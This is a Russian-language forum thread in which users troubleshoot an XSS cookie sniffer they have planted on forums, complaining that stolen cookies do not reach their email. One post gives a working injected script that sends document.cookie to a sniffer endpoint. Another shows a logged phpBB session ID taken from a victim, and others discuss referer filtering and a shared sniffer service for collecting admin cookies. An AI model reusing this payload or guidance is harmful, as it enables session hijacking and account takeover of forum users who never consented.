Чет я никак понять не могу... Добрая часть логов не идет на мыло... Сам проверял... Зашел на форум, где внедрен XSS... Захожу на log сниффера... Есть! Проверяю мыло - Нет! Пробовал на разные мыла подписываться... Результат один! Подписка активна... А куки не идут... Уже стоко народу отвечала на мой топик, а куки пришли только от одного на ящик... Кому интересно внедрен такой скрипт: <script>i=new/**/Image();i.src='/cgi-bin/s.jpg?'+document.cookie;</script> Да... на один ящик еще приходит: host1220 <host1220@serv.hostland.ru> Кому: undisclosed-recipients:; Копия: Тема: No subject Тело: [пустое] Как мне кажется тоже от сниффера...
Заполняю фильтр реферер: site.com Проблема в том, что какие то куки на мыло идут, а какие то нет, хотя в логе отображаются...
Я кстати тоже не пойму что писать там. Чтоб куки доходили на мыло (Mail.ru) Что нужно писать в реферер? Например в кукисе пишет это REFERER=http://www.xxx.com/forum/viewtopic.php?t=900 Чтоб на мыло приходило надо писать www.xxx.com или www.xxx.com/forum/viewtopic.php?t=900 И обязательно заполнять 2 поля?
Barsik, подстроку реферера... например, xxx.com или www.xxx.com... Кстати, сейчас подписка на 2 мыла... по идее должны приходить одинаковые результаты, а на одно мыло, к примеру, пришло 2 куки, а на другое только 1, причем отличное от тех 2... Странно...
Возможно просто сервер принимает сообщения снифера, как спам и фильтрует. Или же сервер античата глючит.
Один аккаунт на гмейле... другой на яндексе... на гмейл пришло уведомление о подписке и один куки... на яндекс подписка, несколько кук, несколько host1220...
Мне на мэйле тоже пришло что то с хостом, но кук нет. Mastermind Спасибо за ответ. А что писать в другой строчке или ее можно не заполнять?
Ребят, согласен, такая же ботва...одну икссэсэс атаку провел на ура...просмотров поста на форуме двадцать из них десять ответов...а приходят только избранные куки......и эти host письма...обидно...куки админа из-за етого глюка не приходят...в списках спама античат вообще не числится...а вот host1220 пробовал добавлять в спам лист не фильтруется...че к чему...=(...
Вот и сам попробовал... Подписался - не приходит... Подписывался через реферер, смотрю в общем логе: [Fri Sep 30 09:54:09 2005] IP=195.149.70.22 SITE= REFERER= QUERY=phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=0733561e97e66c1126e22452fc203c03 AGENT= Т.е. реферер может иногда вообще не заполняться? как тогда их фильтровать???
С почтой могут быть проблеммы... Используйте многопользовательские сниферы... http://antichat.org/sniffer . Там создаете свой снифер и пароль на него по желанию.